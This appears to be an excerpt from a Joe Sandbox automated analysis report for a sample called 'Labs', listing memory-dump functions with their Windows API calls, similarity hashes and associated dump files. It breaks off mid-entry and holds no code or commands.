Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 1027e638d7200e54cf722f1ecd383baf923834da0f3ed77b9e25ea1868b8311d
Instruction ID: 47745a782b6441182ce65b878c65c152450fbc61f4775fed280ea55ae5c77306
Opcode Fuzzy Hash: 1027e638d7200e54cf722f1ecd383baf923834da0f3ed77b9e25ea1868b8311d
Instruction Fuzzy Hash: 2F512835A00205DFCF11EF64C989AAEBBF5EF09310B148099E949AB361CB35ED51DF60

Function 007FA67B Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dbadc64f7c2600c78b54888d38595da08cdf20591d5275fbd8414bf095c7f28
Instruction ID: 92bca60ad7cb77907a076dcf80ea93111a0ae1c1727fd0e0d5632226ad7d075d
Opcode Fuzzy Hash: 6dbadc64f7c2600c78b54888d38595da08cdf20591d5275fbd8414bf095c7f28
Instruction Fuzzy Hash: A741D3B590410CBFD720EB28CC48FB9BBB8EB09350F144165EA1AA73D1D778AD41DA61

Function 00772714 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00772727
ScreenToClient.USER32(008377B0,?), ref: 00772744
GetAsyncKeyState.USER32(00000001), ref: 00772769
GetAsyncKeyState.USER32(00000002), ref: 00772777

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 9ad642f810306af1a9b7957b6229bda6f010c19e53f37ed0c350e2cff4d95433
Instruction ID: e8f32d930b2548c437d3cbf8d47a624c97a02f7c31344c760d40d38e42d3fcc7
Opcode Fuzzy Hash: 9ad642f810306af1a9b7957b6229bda6f010c19e53f37ed0c350e2cff4d95433
Instruction Fuzzy Hash: C3418135504109FFDF1A9F68C948AE9BB74FB46364F20831AF93896291CB38AD50DF91

Function 007C95D7 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 007C95E8
PostMessageW.USER32(?,00000201,00000001), ref: 007C9692
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 007C969A
PostMessageW.USER32(?,00000202,00000000), ref: 007C96A8
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 007C96B0

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: fea025ba6f2b6a22f884fa345ede6e60df05b18e596567a11344623443418159
Instruction ID: 5892908aa650727d354f0b15a62a7e5e1fb2751d11ade372d6e8100445788e6f
Opcode Fuzzy Hash: fea025ba6f2b6a22f884fa345ede6e60df05b18e596567a11344623443418159
Instruction Fuzzy Hash: 4231BA71900219EBDB54CFA8D94CF9E7BB9FB44315F10422DFA24AB2D0C3B49924DB90

Function 007CBD85 Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 007CBD9D
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 007CBDBA
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 007CBDF2
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 007CBE18
_wcsstr.LIBCMT ref: 007CBE22

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 51e95246f00c34747cfca716a72429d0b58871d329769db7ec8c5db944b22c72
Instruction ID: aed3d8d6d57398547e1ec40573df269556324ece9e875a66f449a342b4347f9e
Opcode Fuzzy Hash: 51e95246f00c34747cfca716a72429d0b58871d329769db7ec8c5db944b22c72
Instruction Fuzzy Hash: 2921F972204204BBEB255B79AC4AFBB7B9DDF45B60F10402DF909CA191EF69DC5096A0

Function 007FB7BD Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3

GetWindowLongW.USER32(?,000000F0), ref: 007FB804
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 007FB829
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 007FB841
GetSystemMetrics.USER32(00000004), ref: 007FB86A
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,007E155C,00000000), ref: 007FB888

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 11f751f926baba71cfc9827e319ada53f22db4f2f4fdfbf733db8101297da548
Instruction ID: 9b86ee0cecf869ae599425cc22f00192ac2024e6f30c1b3decba143642f41b4a
Opcode Fuzzy Hash: 11f751f926baba71cfc9827e319ada53f22db4f2f4fdfbf733db8101297da548
Instruction Fuzzy Hash: CF216D71914259AFCB249F39CC08B7A3BA8FB85765F244A39FA25D62E0D7349850CAD0

Function 007E6138 Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 007E6159
GetForegroundWindow.USER32 ref: 007E6170
GetDC.USER32(00000000), ref: 007E61AC
GetPixel.GDI32(00000000,?,00000003), ref: 007E61B8
ReleaseDC.USER32(00000000,00000003), ref: 007E61F3

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 06c70c26dabe0965ed42b5271a7db5c5b2f30756c857b1d6715c0c68b7fded63
Instruction ID: 15e9e7b1a5a9c069b15e0281eefd54dcd1515c12b11034e825e7ae33b7cbc6c8
Opcode Fuzzy Hash: 06c70c26dabe0965ed42b5271a7db5c5b2f30756c857b1d6715c0c68b7fded63
Instruction Fuzzy Hash: 3F21A175A01604EFD750EF65DC88A9ABBF9FF98350F04C469E94A97352CB75AC00CB90

Function 007716CF Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00771729
SelectObject.GDI32(?,00000000), ref: 00771738
BeginPath.GDI32(?), ref: 0077174F
SelectObject.GDI32(?,00000000), ref: 00771778

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 24fe5b5bc044cdd3044ce212e21f3a395a280e080c87256f43f3c79e451a3f67
Instruction ID: 9429f1ab8a6347212ab68bf481b2696333898261f81490ac39232036a3ea0a27
Opcode Fuzzy Hash: 24fe5b5bc044cdd3044ce212e21f3a395a280e080c87256f43f3c79e451a3f67
Instruction Fuzzy Hash: F821C5B0904208EFDF209F28DC48B697BF8F780351F548626F929A61A0D779D991CF94

Function 007CC837 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 007CC84C
_memcmp.LIBCMT ref: 007CC86A
_memcmp.LIBCMT ref: 007CC87D
_memcmp.LIBCMT ref: 007CC895
_memcmp.LIBCMT ref: 007CC8AD

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: b0fd1145f580979a4e17b44b8bd0f0e5f395ffae62c85c97fee3d2af7ecebcfb
Instruction ID: adf7c88f33eeb03e156fc8002fc089dcfa2d5a6954861951d825b8a567731332
Opcode Fuzzy Hash: b0fd1145f580979a4e17b44b8bd0f0e5f395ffae62c85c97fee3d2af7ecebcfb
Instruction Fuzzy Hash: F501F963A442057BE612A1105C46FB7739CEF20354F04402DFE1AD6341FB5CDE1082E0

Function 007D504E Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 007D5075
__beginthreadex.LIBCMT ref: 007D5093
MessageBoxW.USER32(?,?,?,?), ref: 007D50A8
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 007D50BE
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 007D50C5

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 27928953800677d86a74f307dcbc1162d14cfbadce48f1526ff2be7072fb5580
Instruction ID: 4038795740d86ca5367c1dc341a0d9e8b8af105537c26de3ea5256e0d8e3ebe4
Opcode Fuzzy Hash: 27928953800677d86a74f307dcbc1162d14cfbadce48f1526ff2be7072fb5580
Instruction Fuzzy Hash: FD1104B2908708BBCB518BA89C08B9B7BBDBB85321F14425AF915D3360D675C9448BF0

Function 007C8E20 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007C8E3C
GetLastError.KERNEL32(?,007C8900,?,?,?), ref: 007C8E46
GetProcessHeap.KERNEL32(00000008,?,?,007C8900,?,?,?), ref: 007C8E55
HeapAlloc.KERNEL32(00000000,?,007C8900,?,?,?), ref: 007C8E5C
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007C8E73

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 5dbcaca1b63df50331fd012200aa5d7de4ce570dd8f27d741b549e7060f8b151
Instruction ID: 3fa3ec54635d6803eb55aecf6349b687d29442bd547154c4659db53040a18309
Opcode Fuzzy Hash: 5dbcaca1b63df50331fd012200aa5d7de4ce570dd8f27d741b549e7060f8b151
Instruction Fuzzy Hash: C0011D71601244BFDB614FA9DC49E6B7BADFF89755B10056DF849C2220DB329C50CF61

Function 007C7D28 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C7C62,80070057,?,?,?,007C8073), ref: 007C7D45
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C7C62,80070057,?,?), ref: 007C7D60
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C7C62,80070057,?,?), ref: 007C7D6E
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C7C62,80070057,?), ref: 007C7D7E
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C7C62,80070057,?,?), ref: 007C7D8A

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 3ac7f0c408a6fce64aecc8fcbe11776a19c1d7a297f1b2e6cb5af079958793e9
Instruction ID: 4fc71f7bac8cb70dae5c5cc559fd609c619c44fba71dda21b4a1070c308471d1
Opcode Fuzzy Hash: 3ac7f0c408a6fce64aecc8fcbe11776a19c1d7a297f1b2e6cb5af079958793e9
Instruction Fuzzy Hash: 60015A72605214ABDB154F54DC45FAA7BADFF48762F14802CF90AD6210DB75ED00DFA0

Function 007C8CC7 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007C8CDE
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007C8CE8
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007C8CF7
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007C8CFE
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007C8D14

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 071f4301c58d72d21201029cea6d6c99a1789dc8b1ae44567dffa6f6e5002826
Instruction ID: 6532bdede67c62d693c176e1e53b8dd2d7dd27fbc42c7c0b0e4abc63b703f22f
Opcode Fuzzy Hash: 071f4301c58d72d21201029cea6d6c99a1789dc8b1ae44567dffa6f6e5002826
Instruction Fuzzy Hash: 8EF04935300208AFEB914FA59C89F6B3BADFF8D754F10452DF94AC61A0CA65AC41DF61

Function 007C8D28 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007C8D3F
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007C8D49
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8D58
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8D5F
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8D75

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 43adfbae9e1133ae13d0c872030845e9c3fd9b56210474d34ad0f81f7a021924
Instruction ID: 0e53c726f66a3b55721a6bdeba4c233d2b9b11aa5118b20ffabc8e846be7ac23
Opcode Fuzzy Hash: 43adfbae9e1133ae13d0c872030845e9c3fd9b56210474d34ad0f81f7a021924
Instruction Fuzzy Hash: 9DF03731240204AFEBA14FA5EC88F6B3BADFF89754F14412DF94A861A0CB659D41DBA1

Function 007CCD7C Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 007CCD90
GetWindowTextW.USER32(00000000,?,00000100), ref: 007CCDA7
MessageBeep.USER32(00000000), ref: 007CCDBF
KillTimer.USER32(?,0000040A), ref: 007CCDDB
EndDialog.USER32(?,00000001), ref: 007CCDF5

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 12c3ae2899926fbe03af411c19cf7728ebbe9e55bf1ec92052cfe14be87f903d
Instruction ID: a05e4e95e7c57ca362a062e3ddd6786c84ee5bf8f9ef40217806686e16b2104a
Opcode Fuzzy Hash: 12c3ae2899926fbe03af411c19cf7728ebbe9e55bf1ec92052cfe14be87f903d
Instruction Fuzzy Hash: 9B018630640704ABEB225B60DD4EFA67B7DFB10705F04066DF597A10E1DBF9A9548F80

Function 0077178C Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 0077179B
StrokeAndFillPath.GDI32(?,?,007ABBC9,00000000,?), ref: 007717B7
SelectObject.GDI32(?,00000000), ref: 007717CA
DeleteObject.GDI32 ref: 007717DD
StrokePath.GDI32(?), ref: 007717F8

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: f6be4bcab285afa606526621273256a2d345f900e8774b4b3d14cb1b91de0d52
Instruction ID: 2885e656f30fd807a067adcbb8730a2b54010d0fa3f38d63b8aca4048517ec70
Opcode Fuzzy Hash: f6be4bcab285afa606526621273256a2d345f900e8774b4b3d14cb1b91de0d52
Instruction Fuzzy Hash: E6F03770008608EBDB659F2AEC4CB583FA4BB41362F44C624F92D441F0CB38CA96DF94

Function 007DC9DA Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 007DCA75
CoCreateInstance.OLE32(00803D3C,00000000,00000001,00803BAC,?), ref: 007DCA8D

Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77

CoUninitialize.OLE32 ref: 007DCCFA

Strings

.lnk, xrefs: 007DCA09, 007DCA31, 007DCA3B

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 12929d651455749f2103e8300a395ac161cb405accea587b9d75a1e4479cf9e0
Instruction ID: d48ac8ecf9fb8d54651aadf4277680830323bc6da0a7764edbbc8ee95235434a
Opcode Fuzzy Hash: 12929d651455749f2103e8300a395ac161cb405accea587b9d75a1e4479cf9e0
Instruction Fuzzy Hash: 88A14A71104205EFD700EF64D885EABB7ECFF94354F00891CF19997292EB74AA09CBA2

Function 0077E3C6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00790FE6: std::exception::exception.LIBCMT ref: 0079101C
Part of subcall function 00790FE6: __CxxThrowException@8.LIBCMT ref: 00791031

Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77

Part of subcall function 00781680: _memmove.LIBCMT ref: 007816DB

__swprintf.LIBCMT ref: 0077E598

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0077E431

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 3fa2093aae5f87531891c54207164c121c4586b5ff4811f9aa3e48f01a9ea2bd
